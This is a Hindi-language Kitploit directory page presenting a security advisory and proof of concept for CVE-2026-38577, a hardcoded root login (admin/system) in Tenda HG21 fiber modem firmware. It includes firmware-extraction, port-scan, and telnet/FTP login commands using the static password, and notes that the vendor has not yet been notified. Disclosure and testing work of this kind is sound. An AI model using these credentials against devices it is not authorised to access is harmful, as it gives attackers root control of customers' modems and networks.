Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-38577-by-deepak-Anmol — प्रूफ-ऑफ-कॉन्सेप्ट जो Tenda HG21 XPON मॉडेम फर्मवेयर में हार्डकोडेड रूट क्रेडेंशियल्स (admin/system) को प्रदर्शित करता है, जो टेलनेट और FTP के माध्यम से अनधिकृत रूट एक्सेस को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/poxsky/cve-2026-38577-by-deepak-anmol
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगहार्डवेयर और IoT सुरक्षाफर्मवेयर विश्लेषण
GitHubpoxsky/cve-2026-38577-by-deepak-anmol

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-38577-by-deepak-Anmol

प्रूफ-ऑफ-कॉन्सेप्ट जो Tenda HG21 XPON मॉडेम फर्मवेयर में हार्डकोडेड रूट क्रेडेंशियल्स (admin/system) को प्रदर्शित करता है, जो टेलनेट और FTP के माध्यम से अनधिकृत रूट एक्सेस को सक्षम बनाता है।

रिपॉजिटरी देखें
9घं 27मि पहलेअभी तक समीक्षित नहीं

CVE-2026-38577 — टेंडा HG21 हार्डकोडेड रूट क्रेडेंशियल्स

सारांश

फ़ील्डमान
CVE IDCVE-2026-38577
विक्रेताटेंडा
उत्पादटेंडा HG21 (XPON फाइबर मॉडेम)
प्रभावित संस्करणV4.0.0-260302
उत्पाद कुंजीHG21-V1.0-TDE01
हार्डवेयर संस्करणV1.0
फर्मवेयर निर्माण तिथि2026-03-02
फर्मवेयर फ़ाइलUS_HG21re_300002982_en_xpon_2.zip
भेद्यता वर्गCWE-798: हार्डकोडेड क्रेडेंशियल्स का उपयोग
खोजकर्ताअनमोल सिंह राजपूत — स्वतंत्र सुरक्षा शोधकर्ता
प्रकटीकरण स्थितिCVE आरक्षण के समय विक्रेता को अभी तक सूचित नहीं किया गया — CVE असाइनमेंट तिथि से 90-दिवसीय जिम्मेदार प्रकटीकरण समयरेखा लागू होती है

विवरण

टेंडा HG21 XPON फाइबर मॉडेम के फर्मवेयर विश्लेषण से शिप किए गए फर्मवेयर इमेज में बेक किया गया एक हार्डकोडेड प्रशासनिक खाता उजागर हुआ। इस खाते को पूर्ण रूट विशेषाधिकार (UID 0) प्रदान किए गए हैं और इसके क्रेडेंशियल्स सभी डिवाइसों पर स्थिर हैं, जिसका अर्थ है कि कोई भी हमलावर जो किसी कमजोर यूनिट पर उजागर प्रबंधन सेवा तक पहुँच सकता है, ग्राहक-सेट वेब-UI पासवर्ड जाने बिना रूट के रूप में प्रमाणित हो सकता है।

यह कहाँ पाया गया

  • निकाले गए फर्मवेयर में /etc/passwd एक admin प्रविष्टि के साथ आता है जिसमें SHA256crypt पासवर्ड हैश है जो स्थिर मान system में हल होता है।
  • खाते का UID 0 है — अर्थात, यह वास्तव में रूट है, कोई प्रतिबंधित सेवा खाता नहीं।
  • कोई /etc/shadow मौजूद नहीं है, इसलिए passwd में कमजोर/स्थिर हैश ही खाते की सुरक्षा करने वाला एकमात्र द्वार है।
  • /etc/inetd.conf telnetd और ftpd शुरू करता है, दोनों रूट के रूप में स्पॉन होते हैं, इसलिए हार्डकोडेड खाता नेटवर्क पर पहुँच योग्य है, न कि केवल सीरियल/UART कंसोल पर।
  • वेब प्रबंधन इंटरफ़ेस केवल सादे HTTP पर परोसा जाता है (कोई TLS नहीं), जो एक द्वितीयक हार्डनिंग अंतराल है लेकिन स्वयं CVE नहीं है।

प्रभाव

किसी कमजोर डिवाइस की टेलनेट (TCP/23) या FTP (TCP/21) सेवा तक नेटवर्क पहुँच रखने वाला हमलावर स्थिर पासवर्ड का उपयोग करके admin के रूप में लॉग इन कर सकता है और रूट शेल / रूट-स्तरीय फ़ाइल पहुँच प्राप्त कर सकता है। यह कम से कम निम्नलिखित की अनुमति देता है:

  • कोड निष्पादन — टेलनेट के माध्यम से रूट शेल।
  • विशेषाधिकार वृद्धि — कोई विशेषाधिकार सीमा मौजूद नहीं है; खाता रूट से शुरू होता है।
  • सूचना प्रकटीकरण — पूर्ण फाइलसिस्टम/कॉन्फ़िगरेशन पहुँच, जिसमें डिवाइस पर संग्रहीत कोई भी ग्राहक नेटवर्क क्रेडेंशियल्स शामिल हैं।

मूल सबमिशन से CVSS वेक्टर (प्रकाशित होने पर विक्रेता स्कोरिंग भिन्न हो सकती है):

  • हमला वेक्टर: नेटवर्क
  • आवश्यक विशेषाधिकार: कोई नहीं (क्रेडेंशियल्स हार्डकोडेड/ज्ञात हैं)
  • उपयोगकर्ता सहभागिता: कोई नहीं
  • गोपनीयता / अखंडता / उपलब्धता: उच्च / उच्च / उच्च

प्रूफ ऑफ कॉन्सेप्ट

यह एक क्रेडेंशियल-आधारित PoC है — यह प्रदर्शित करता है कि हार्डकोडेड खाता प्रमाणित होता है और रूट प्रदान करता है, कोई मेमोरी-भ्रष्टाचार शोषण नहीं। इसे केवल उस डिवाइस पर चलाएँ जिसके आप मालिक हैं या जिसका परीक्षण करने के लिए आपको स्पष्ट रूप से अधिकृत किया गया है।

1. पुष्टि करें कि क्रेडेंशियल फर्मवेयर में मौजूद है

root@kitploit:~
# फर्मवेयर निकालें (binwalk या आपकी पसंद का विक्रेता टूल)
binwalk -e US_HG21re_300002982_en_xpon_2.bin

# passwd फ़ाइल का पता लगाएँ और निरीक्षण करें
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh

2. पुष्टि करें कि सेवा पहुँच योग्य है

root@kitploit:~
nmap -p 21,23 <target-ip>

3. हार्डकोडेड खाते से प्रमाणित करें

root@kitploit:~
telnet <target-ip>
# login: admin
# password: system
root@kitploit:~
ftp <target-ip>
# Name: admin
# Password: system

किसी भी सेवा पर सफल लॉगिन रूट-विशेषाधिकार वाला शेल/FTP सत्र लौटाता है (id uid=0(root) रिपोर्ट करेगा)।

उपचार

  • विक्रेता को हार्डकोडेड admin/system खाते को पूरी तरह से हटा देना चाहिए, या कम से कम पहले बूट पर सेट किया गया अद्वितीय, प्रति-डिवाइस यादृच्छिक पासवर्ड अनिवार्य करना चाहिए (केवल सीरियल नंबर से व्युत्पन्न नहीं)।
  • telnetd/ftpd को डिफ़ॉल्ट रूप से अक्षम करें; दूरस्थ प्रशासन के लिए स्पष्ट ऑप्ट-इन और प्रमाणित, एन्क्रिप्टेड चैनल (SSH/SFTP) की आवश्यकता हो।
  • प्रबंधन UI को केवल HTTPS पर परोसें।
  • पहले से तैनात किसी भी यूनिट में अनिवार्य फर्मवेयर अपडेट के माध्यम से स्थिर क्रेडेंशियल को घुमाएँ, और अपडेट पर पासवर्ड रीसेट अनिवार्य करें।

समयरेखा

तिथिघटना
2026-03-02कमजोर फर्मवेयर बिल्ड जारी किया गया
—स्वतंत्र फर्मवेयर विश्लेषण के दौरान खोजा गया
2026-04-09MITRE के माध्यम से CVE-2026-38577 आरक्षित
—विक्रेता सूचना लंबित (CVE असाइनमेंट से 90-दिवसीय प्रकटीकरण विंडो)

श्रेय

निम्न द्वारा खोजा और रिपोर्ट किया गया:

  • अनमोल सिंह राजपूत — LinkedIn
  • दीपक जी — LinkedIn

संदर्भ

  • https://www.tenda.com.cn
  • https://cwe.mitre.org/data/definitions/798.html
टूल डाउनलोड करें